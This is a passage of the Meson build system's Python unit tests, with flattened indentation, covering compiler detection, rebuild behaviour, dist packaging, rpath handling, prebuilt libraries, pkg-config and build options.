# Pop it so we don't use it for the next detection
evalue = os.environ.pop(evar)
# Very rough/strict heuristics. Would never work for actual
# compiler detection, but should be ok for the tests.
ebase = os.path.basename(evalue)
if ebase.startswith('g') or ebase.endswith(('-gcc', '-g++')):
self.assertIsInstance(ecc, gnu)
self.assertIsInstance(elinker, ar)
elif 'clang-cl' in ebase:
self.assertIsInstance(ecc, clangcl)
self.assertIsInstance(elinker, lib)
elif 'clang' in ebase:
self.assertIsInstance(ecc, clang)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('ic'):
self.assertIsInstance(ecc, intel)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('cl'):
self.assertIsInstance(ecc, msvc)
self.assertIsInstance(elinker, lib)
else:
raise AssertionError('Unknown compiler {!r}'.format(evalue))
# Check that we actually used the evalue correctly as the compiler
self.assertEqual(ecc.get_exelist(), split_args(evalue))
# Do auto-detection of compiler based on platform, PATH, etc.
cc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(cc.version)
linker = env.detect_static_linker(cc)
# Check compiler type
if isinstance(cc, gnu):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_sunos():
self.assertIsInstance(cc.linker, (mesonbuild.linkers.SolarisDynamicLinker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin))
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, clangcl):
self.assertIsInstance(linker, lib)
self.assertIsInstance(cc.linker, mesonbuild.linkers.ClangClDynamicLinker)
if isinstance(cc, clang):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
# This is clang, not clang-cl
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, intel):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
self.assertIsInstance(cc.linker, mesonbuild.linkers.XilinkDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuDynamicLinker)
if isinstance(cc, msvc):
self.assertTrue(is_windows())
self.assertIsInstance(linker, lib)
self.assertEqual(cc.id, 'msvc')
self.assertTrue(hasattr(cc, 'is_64'))
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
# If we're on Windows CI, we know what the compiler will be
if 'arch' in os.environ:
if os.environ['arch'] == 'x64':
self.assertTrue(cc.is_64)
else:
self.assertFalse(cc.is_64)
# Set evar ourselves to a wrapper script that just calls the same
# exelist + some argument. This is meant to test that setting
# something like `ccache gcc -pipe` or `distcc ccache gcc` works.
wrapper = os.path.join(testdir, 'compiler wrapper.py')
wrappercc = python_command + [wrapper] + cc.get_exelist() + ['-DSOME_ARG']
wrappercc_s = ''
for w in wrappercc:
wrappercc_s += quote_arg(w) + ' '
os.environ[evar] = wrappercc_s
wcc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
# Check static linker too
wrapperlinker = python_command + [wrapper] + linker.get_exelist() + linker.get_always_args()
wrapperlinker_s = ''
for w in wrapperlinker:
wrapperlinker_s += quote_arg(w) + ' '
os.environ['AR'] = wrapperlinker_s
wlinker = env.detect_static_linker(wcc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop('AR')
# Must be the same type since it's a wrapper around the same exelist
self.assertIs(type(cc), type(wcc))
self.assertIs(type(linker), type(wlinker))
# Ensure that the exelist is correct
self.assertEqual(wcc.get_exelist(), wrappercc)
self.assertEqual(wlinker.get_exelist(), wrapperlinker)
# Ensure that the version detection worked correctly
self.assertEqual(cc.version, wcc.version)
if hasattr(cc, 'is_64'):
self.assertEqual(cc.is_64, wcc.is_64)
def test_always_prefer_c_compiler_for_asm(self):
testdir = os.path.join(self.common_test_dir, '137 c cpp and asm')
# Skip if building with MSVC
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'msvc':
raise unittest.SkipTest('MSVC can\'t compile assembly')
self.init(testdir)
commands = {'c-asm': {}, 'cpp-asm': {}, 'cpp-c-asm': {}, 'c-cpp-asm': {}}
for cmd in self.get_compdb():
# Get compiler
split = split_args(cmd['command'])
if split[0] == 'ccache':
compiler = split[1]
else:
compiler = split[0]
# Classify commands
if 'Ic-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-asm']['c'] = compiler
else:
                    raise AssertionError('{!r} found in c-asm?'.format(cmd['command']))
elif 'Icpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Ic-cpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-cpp-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['c-cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in c-cpp-asm?'.format(cmd['command']))
elif 'Icpp-c-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['cpp-c-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-c-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-c-asm?'.format(cmd['command']))
else:
raise AssertionError('Unknown command {!r} found'.format(cmd['command']))
# Check that .S files are always built with the C compiler
self.assertEqual(commands['c-asm']['asm'], commands['c-asm']['c'])
self.assertEqual(commands['c-asm']['asm'], commands['cpp-asm']['asm'])
self.assertEqual(commands['cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['c-cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['cpp-c-asm']['asm'], commands['cpp-c-asm']['c'])
self.assertNotEqual(commands['cpp-asm']['asm'], commands['cpp-asm']['cpp'])
self.assertNotEqual(commands['c-cpp-asm']['c'], commands['c-cpp-asm']['cpp'])
self.assertNotEqual(commands['cpp-c-asm']['c'], commands['cpp-c-asm']['cpp'])
# Check that the c-asm target is always linked with the C linker
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('build c-asm.*: c_LINKER', contents)
self.assertIsNotNone(m, msg=contents)
def test_preprocessor_checks_CPPFLAGS(self):
'''
Test that preprocessor compiler checks read CPPFLAGS and also CFLAGS but
not LDFLAGS.
'''
testdir = os.path.join(self.common_test_dir, '136 get define')
define = 'MESON_TEST_DEFINE_VALUE'
# NOTE: this list can't have \n, ' or "
# \n is never substituted by the GNU pre-processor via a -D define
# ' and " confuse split_args() even when they are escaped
# % and # confuse the MSVC preprocessor
# !, ^, *, and < confuse lcc preprocessor
value = 'spaces and fun@$&()-=_+{}[]:;>?,./~`'
for env_var in ['CPPFLAGS', 'CFLAGS']:
env = {}
env[env_var] = '-D{}="{}"'.format(define, value)
            env['LDFLAGS'] = '-DMESON_FAIL_VALUE=cflags-read'
self.init(testdir, extra_args=['-D{}={}'.format(define, value)], override_envvars=env)
def test_custom_target_exe_data_deterministic(self):
testdir = os.path.join(self.common_test_dir, '113 custom target capture')
self.init(testdir)
meson_exe_dat1 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.wipe()
self.init(testdir)
meson_exe_dat2 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.assertListEqual(meson_exe_dat1, meson_exe_dat2)
def test_noop_changes_cause_no_rebuilds(self):
'''
Test that no-op changes to the build files such as mtime do not cause
a rebuild of anything.
'''
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of meson.build should not rebuild anything
self.utime(os.path.join(testdir, 'meson.build'))
self.assertReconfiguredBuildIsNoop()
        # Changing mtime of libfile.c should rebuild the library, but not relink the executable
self.utime(os.path.join(testdir, 'libfile.c'))
self.assertBuildRelinkedOnlyTarget('mylib')
def test_source_changes_cause_rebuild(self):
'''
Test that changes to sources and headers cause rebuilds, but not
changes to unused files (as determined by the dependency file) in the
input files list.
'''
testdir = os.path.join(self.common_test_dir, '20 header in file list')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of header.h should rebuild everything
self.utime(os.path.join(testdir, 'header.h'))
self.assertBuildRelinkedOnlyTarget('prog')
def test_custom_target_changes_cause_rebuild(self):
'''
Test that in a custom target, changes to the input files, the
ExternalProgram, and any File objects on the command-line cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '60 custom header generator')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of these should rebuild everything
for f in ('input.def', 'makeheader.py', 'somefile.txt'):
self.utime(os.path.join(testdir, f))
self.assertBuildRelinkedOnlyTarget('prog')
def test_source_generator_program_cause_rebuild(self):
'''
Test that changes to generator programs in the source tree cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '94 gen extra')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of generator should rebuild the executable
self.utime(os.path.join(testdir, 'srcgen.py'))
self.assertRebuiltTarget('basic')
def test_static_library_lto(self):
'''
Test that static libraries can be built with LTO and linked to
executables. On Linux, this requires the use of gcc-ar.
https://github.com/mesonbuild/meson/issues/1646
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'clang' and is_windows():
raise unittest.SkipTest('LTO not (yet) supported by windows clang')
self.init(testdir, extra_args='-Db_lto=true')
self.build()
self.run_tests()
def test_dist_git(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
self.dist_impl(_git_init)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def has_working_hg(self):
if not shutil.which('hg'):
return False
try:
# This check should not be necessary, but
# CI under macOS passes the above test even
# though Mercurial is not installed.
if subprocess.call(['hg', '--version'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) != 0:
return False
return True
except FileNotFoundError:
return False
def test_dist_hg(self):
if not self.has_working_hg():
raise unittest.SkipTest('Mercurial not found or broken.')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
def hg_init(project_dir):
subprocess.check_call(['hg', 'init'], cwd=project_dir)
with open(os.path.join(project_dir, '.hg', 'hgrc'), 'w') as f:
print('[ui]', file=f)
print('username=Author Person <teh_coderz@example.com>', file=f)
subprocess.check_call(['hg', 'add', 'meson.build', 'distexe.c'], cwd=project_dir)
subprocess.check_call(['hg', 'commit', '-m', 'I am a project'], cwd=project_dir)
try:
self.dist_impl(hg_init, include_subprojects=False)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the hg files so cleaning up the dir
# fails sometimes.
pass
def test_dist_git_script(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
with tempfile.TemporaryDirectory() as tmpdir:
project_dir = os.path.join(tmpdir, 'a')
shutil.copytree(os.path.join(self.unit_test_dir, '35 dist script'),
project_dir)
_git_init(project_dir)
self.init(project_dir)
self.build('dist')
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def create_dummy_subproject(self, project_dir, name):
path = os.path.join(project_dir, 'subprojects', name)
os.makedirs(path)
with open(os.path.join(path, 'meson.build'), 'w') as ofile:
ofile.write("project('{}')".format(name))
return path
def dist_impl(self, vcs_init, include_subprojects=True):
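        '''
        Shared implementation of the dist tests: create a throwaway project
        in a temporary directory, initialize it with the given VCS, run the
        'dist' target, and verify the generated archives and checksums.
        '''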
# Create this on the fly because having rogue .git directories inside
# the source tree leads to all kinds of trouble.
with tempfile.TemporaryDirectory() as project_dir:
with open(os.path.join(project_dir, 'meson.build'), 'w') as ofile:
ofile.write('''project('disttest', 'c', version : '1.4.3')
e = executable('distexe', 'distexe.c')
test('dist test', e)
subproject('vcssub', required : false)
subproject('tarballsub', required : false)
''')
with open(os.path.join(project_dir, 'distexe.c'), 'w') as ofile:
ofile.write('''#include<stdio.h>
int main(int argc, char **argv) {
printf("I am a distribution test.\\n");
return 0;
}
''')
xz_distfile = os.path.join(self.distdir, 'disttest-1.4.3.tar.xz')
xz_checksumfile = xz_distfile + '.sha256sum'
zip_distfile = os.path.join(self.distdir, 'disttest-1.4.3.zip')
zip_checksumfile = zip_distfile + '.sha256sum'
vcs_init(project_dir)
if include_subprojects:
vcs_init(self.create_dummy_subproject(project_dir, 'vcssub'))
self.create_dummy_subproject(project_dir, 'tarballsub')
self.create_dummy_subproject(project_dir, 'unusedsub')
self.init(project_dir)
self.build('dist')
self.assertPathExists(xz_distfile)
self.assertPathExists(xz_checksumfile)
self.assertPathDoesNotExist(zip_distfile)
self.assertPathDoesNotExist(zip_checksumfile)
self._run(self.meson_command + ['dist', '--formats', 'zip'],
workdir=self.builddir)
self.assertPathExists(zip_distfile)
self.assertPathExists(zip_checksumfile)
if include_subprojects:
z = zipfile.ZipFile(zip_distfile)
self.assertEqual(sorted(['disttest-1.4.3/',
'disttest-1.4.3/meson.build',
'disttest-1.4.3/distexe.c']),
sorted(z.namelist()))
self._run(self.meson_command + ['dist', '--formats', 'zip', '--include-subprojects'],
workdir=self.builddir)
z = zipfile.ZipFile(zip_distfile)
self.assertEqual(sorted(['disttest-1.4.3/',
'disttest-1.4.3/subprojects/',
'disttest-1.4.3/meson.build',
'disttest-1.4.3/distexe.c',
'disttest-1.4.3/subprojects/tarballsub/',
'disttest-1.4.3/subprojects/vcssub/',
'disttest-1.4.3/subprojects/tarballsub/meson.build',
'disttest-1.4.3/subprojects/vcssub/meson.build']),
sorted(z.namelist()))
def test_rpath_uses_ORIGIN(self):
'''
Test that built targets use $ORIGIN in rpath, which ensures that they
are relocatable and ensures that builds are reproducible since the
build directory won't get embedded into the built binaries.
'''
if is_windows() or is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.common_test_dir, '42 library chain')
self.init(testdir)
self.build()
for each in ('prog', 'subdir/liblib1.so', ):
rpath = get_rpath(os.path.join(self.builddir, each))
self.assertTrue(rpath, 'Rpath could not be determined for {}.'.format(each))
if is_dragonflybsd():
# DragonflyBSD will prepend /usr/lib/gccVERSION to the rpath,
# so ignore that.
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
rpaths = rpath.split(':')[1:]
else:
rpaths = rpath.split(':')
for path in rpaths:
self.assertTrue(path.startswith('$ORIGIN'), msg=(each, path))
# These two don't link to anything else, so they do not need an rpath entry.
for each in ('subdir/subdir2/liblib2.so', 'subdir/subdir3/liblib3.so'):
rpath = get_rpath(os.path.join(self.builddir, each))
if is_dragonflybsd():
# The rpath should be equal to /usr/lib/gccVERSION
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
self.assertEqual(len(rpath.split(':')), 1)
else:
self.assertTrue(rpath is None)
def test_dash_d_dedup(self):
testdir = os.path.join(self.unit_test_dir, '9 d dedup')
self.init(testdir)
cmd = self.get_compdb()[0]['command']
self.assertTrue('-D FOO -D BAR' in cmd or
'"-D" "FOO" "-D" "BAR"' in cmd or
'/D FOO /D BAR' in cmd or
'"/D" "FOO" "/D" "BAR"' in cmd)
def test_all_forbidden_targets_tested(self):
'''
Test that all forbidden targets are tested in the '154 reserved targets'
test. Needs to be a unit test because it accesses Meson internals.
'''
testdir = os.path.join(self.common_test_dir, '154 reserved targets')
targets = mesonbuild.coredata.FORBIDDEN_TARGET_NAMES
# We don't actually define a target with this name
targets.pop('build.ninja')
# Remove this to avoid multiple entries with the same name
# but different case.
targets.pop('PHONY')
for i in targets:
self.assertPathExists(os.path.join(testdir, i))
def detect_prebuild_env(self):
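        '''
        Detect the host C compiler and static linker and return them together
        with the platform-specific object file and shared library suffixes.
        '''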
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
stlinker = env.detect_static_linker(cc)
if mesonbuild.mesonlib.is_windows():
object_suffix = 'obj'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_cygwin():
object_suffix = 'o'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_osx():
object_suffix = 'o'
shared_suffix = 'dylib'
else:
object_suffix = 'o'
shared_suffix = 'so'
return (cc, stlinker, object_suffix, shared_suffix)
def pbcompile(self, compiler, source, objectfile, extra_args=None):
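        '''
        Compile a single source file into an object file with the given
        compiler, using MSVC- or GCC-style arguments as appropriate.
        '''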
cmd = compiler.get_exelist()
extra_args = extra_args or []
if compiler.get_argument_syntax() == 'msvc':
cmd += ['/nologo', '/Fo' + objectfile, '/c', source] + extra_args
else:
cmd += ['-c', source, '-o', objectfile] + extra_args
subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def test_prebuilt_object(self):
(compiler, _, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '15 prebuilt object')
source = os.path.join(tdir, 'source.c')
objectfile = os.path.join(tdir, 'prebuilt.' + object_suffix)
self.pbcompile(compiler, source, objectfile)
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(objectfile)
def build_static_lib(self, compiler, linker, source, objectfile, outfile, extra_args=None):
if extra_args is None:
extra_args = []
        # Build the archiving command from the detected static linker so that
        # both `ar` and MSVC `lib` are handled without hardcoding either tool.
        link_cmd = linker.get_exelist()
link_cmd += linker.get_always_args()
link_cmd += linker.get_std_link_args()
link_cmd += linker.get_output_args(outfile)
link_cmd += [objectfile]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_static_lib(self):
(cc, stlinker, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '16 prebuilt static')
source = os.path.join(tdir, 'libdir/best.c')
objectfile = os.path.join(tdir, 'libdir/best.' + object_suffix)
stlibfile = os.path.join(tdir, 'libdir/libbest.a')
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
def build_shared_lib(self, compiler, source, objectfile, outfile, impfile, extra_args=None):
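        '''
        Build a shared library (plus an import library with MSVC) from a
        single source file outside of Meson, for use by the prebuilt-library
        tests.
        '''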
if extra_args is None:
extra_args = []
if compiler.get_argument_syntax() == 'msvc':
link_cmd = compiler.get_linker_exelist() + [
'/NOLOGO', '/DLL', '/DEBUG', '/IMPLIB:' + impfile,
'/OUT:' + outfile, objectfile]
else:
if not (compiler.info.is_windows() or compiler.info.is_cygwin() or compiler.info.is_darwin()):
extra_args += ['-fPIC']
link_cmd = compiler.get_exelist() + ['-shared', '-o', outfile, objectfile]
if not mesonbuild.mesonlib.is_osx():
link_cmd += ['-Wl,-soname=' + os.path.basename(outfile)]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_shared_lib(self):
(cc, _, object_suffix, shared_suffix) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '17 prebuilt shared')
source = os.path.join(tdir, 'alexandria.c')
objectfile = os.path.join(tdir, 'alexandria.' + object_suffix)
impfile = os.path.join(tdir, 'alexandria.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(tdir, 'alexandria.' + shared_suffix)
elif is_cygwin():
shlibfile = os.path.join(tdir, 'cygalexandria.' + shared_suffix)
else:
shlibfile = os.path.join(tdir, 'libalexandria.' + shared_suffix)
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(tdir, 'alexandria.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_static(self):
'''
        Test that we prefer static libraries when `static: true` is
        passed to dependency() with pkg-config. Can't be an ordinary test
        because we need to build libs and try to find them from meson.build.
        Also test that it's not a hard error to have unsatisfiable library deps,
        since system libraries such as -lm will never be found statically.
https://github.com/mesonbuild/meson/issues/2785
'''
(cc, stlinker, objext, shext) = self.detect_prebuild_env()
testdir = os.path.join(self.unit_test_dir, '18 pkgconfig static')
source = os.path.join(testdir, 'foo.c')
objectfile = os.path.join(testdir, 'foo.' + objext)
stlibfile = os.path.join(testdir, 'libfoo.a')
impfile = os.path.join(testdir, 'foo.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(testdir, 'foo.' + shext)
elif is_cygwin():
shlibfile = os.path.join(testdir, 'cygfoo.' + shext)
else:
shlibfile = os.path.join(testdir, 'libfoo.' + shext)
# Build libs
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile, extra_args=['-DFOO_STATIC'])
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run test
try:
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': self.builddir})
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(testdir, 'foo.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h', '.in']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_gen_escaping(self):
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
prefix = '/usr/with spaces'
libdir = 'lib'
self.init(testdir, extra_args=['--prefix=' + prefix,
'--libdir=' + libdir])
# Find foo dependency
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
# Ensure link_args are properly quoted
libdir = PurePath(prefix) / PurePath(libdir)
link_args = ['-L' + libdir.as_posix(), '-lfoo']
self.assertEqual(foo_dep.get_link_args(), link_args)
# Ensure include args are properly quoted
incdir = PurePath(prefix) / PurePath('include')
cargs = ['-I' + incdir.as_posix(), '-DLIBFOO']
        # pkg-config and pkgconf do not return the arguments in the same order
self.assertEqual(sorted(foo_dep.get_compile_args()), sorted(cargs))
def test_array_option_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
expected['value'] = ['oink', 'boink']
self.setconf('-Dlist=oink,boink')
changed = get_opt()
self.assertEqual(changed, expected)
def test_array_option_bad_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
with self.assertRaises(subprocess.CalledProcessError):
self.setconf('-Dlist=bad')
changed = get_opt()
self.assertDictEqual(changed, expected)
def test_array_option_empty_equivalents(self):
"""Array options treat -Dopt=[] and -Dopt= as equivalent."""
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': [],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir, extra_args='-Dlist=')
original = get_opt()
self.assertDictEqual(original, expected)
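    # For reference, array options accept several equivalent command-line
    # spellings; the tests above and below exercise forms such as:
    #   -Dlist=foo,bar
    #   -Dlist=['foo', 'bar']
    #   -Dlist=               (empty array, same as -Dlist=[])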
def opt_has(self, name, value):
res = self.introspect('--buildoptions')
found = False
for i in res:
if i['name'] == name:
self.assertEqual(i['value'], value)
found = True
break
self.assertTrue(found, "Array option not found in introspect data.")
def test_free_stringarray_setting(self):
testdir = os.path.join(self.common_test_dir, '43 options')
self.init(testdir)
self.opt_has('free_array_opt', [])
self.setconf('-Dfree_array_opt=foo,bar', will_build=False)
self.opt_has('free_array_opt', ['foo', 'bar'])
self.setconf("-Dfree_array_opt=['a,b', 'c,d']", will_build=False)
self.opt_has('free_array_opt', ['a,b', 'c,d'])
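    # "meson wrap promote <name-or-path>" copies a nested subproject (or its
    # .wrap file) into the top-level subprojects/ directory so the outer project
    # can use it directly; the next two tests drive it via self.wrap_command,
    # roughly:
    #   meson wrap promote s3
    #   meson wrap promote subprojects/s2/subprojects/scommon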
def test_subproject_promotion(self):
testdir = os.path.join(self.unit_test_dir, '12 promote')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
s3dir = os.path.join(spdir, 's3')
scommondir = os.path.join(spdir, 'scommon')
self.assertFalse(os.path.isdir(s3dir))
subprocess.check_call(self.wrap_command + ['promote', 's3'], cwd=workdir)
self.assertTrue(os.path.isdir(s3dir))
self.assertFalse(os.path.isdir(scommondir))
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'scommon'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'invalid/path/to/scommon'],
cwd=workdir,
stderr=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isdir(scommondir))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/scommon'], cwd=workdir)
self.assertTrue(os.path.isdir(scommondir))
promoted_wrap = os.path.join(spdir, 'athing.wrap')
self.assertFalse(os.path.isfile(promoted_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'athing'], cwd=workdir)
self.assertTrue(os.path.isfile(promoted_wrap))
self.init(workdir)
self.build()
def test_subproject_promotion_wrap(self):
testdir = os.path.join(self.unit_test_dir, '44 promote wrap')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
ambiguous_wrap = os.path.join(spdir, 'ambiguous.wrap')
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'ambiguous'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isfile(ambiguous_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/ambiguous.wrap'], cwd=workdir)
self.assertTrue(os.path.isfile(ambiguous_wrap))
def test_warning_location(self):
tdir = os.path.join(self.unit_test_dir, '22 warning location')
out = self.init(tdir)
for expected in [
r'meson.build:4: WARNING: Keyword argument "link_with" defined multiple times.',
r'sub' + os.path.sep + r'meson.build:3: WARNING: Keyword argument "link_with" defined multiple times.',
r'meson.build:6: WARNING: a warning of some sort',
r'sub' + os.path.sep + r'meson.build:4: WARNING: subdir warning',
r'meson.build:7: WARNING: Module unstable-simd has no backwards or forwards compatibility and might not exist in future releases.',
r"meson.build:11: WARNING: The variable(s) 'MISSING' in the input file 'conf.in' are not present in the given configuration data.",
r'meson.build:1: WARNING: Passed invalid keyword argument "invalid".',
]:
self.assertRegex(out, re.escape(expected))
for wd in [
self.src_root,
self.builddir,
os.getcwd(),
]:
self.new_builddir()
out = self.init(tdir, workdir=wd)
expected = os.path.join(relpath(tdir, self.src_root), 'meson.build')
relwd = relpath(self.src_root, wd)
if relwd != '.':
expected = os.path.join(relwd, expected)
expected = '\n' + expected + ':'
self.assertIn(expected, out)
def test_error_location_path(self):
'''Test locations in meson errors contain correct paths'''
# this list contains errors from all the different steps in the
# lexer/parser/interpreter we have tests for.
for (t, f) in [
('10 out of bounds', 'meson.build'),
('18 wrong plusassign', 'meson.build'),
('61 bad option argument', 'meson_options.txt'),
('102 subdir parse error', os.path.join('subdir', 'meson.build')),
('103 invalid option file', 'meson_options.txt'),
]:
tdir = os.path.join(self.src_root, 'test cases', 'failing', t)
for wd in [
self.src_root,
self.builddir,
os.getcwd(),
]:
try:
self.init(tdir, workdir=wd)
except subprocess.CalledProcessError as e:
expected = os.path.join('test cases', 'failing', t, f)
relwd = relpath(self.src_root, wd)
if relwd != '.':
expected = os.path.join(relwd, expected)
expected = '\n' + expected + ':'
self.assertIn(expected, e.output)
else:
self.fail('configure unexpectedly succeeded')
def test_permitted_method_kwargs(self):
tdir = os.path.join(self.unit_test_dir, '25 non-permitted kwargs')
out = self.init(tdir)
for expected in [
r'WARNING: Passed invalid keyword argument "prefixxx".',
r'WARNING: Passed invalid keyword argument "argsxx".',
r'WARNING: Passed invalid keyword argument "invalidxx".',
]:
self.assertRegex(out, re.escape(expected))
def test_templates(self):
ninja = detect_ninja()
if ninja is None:
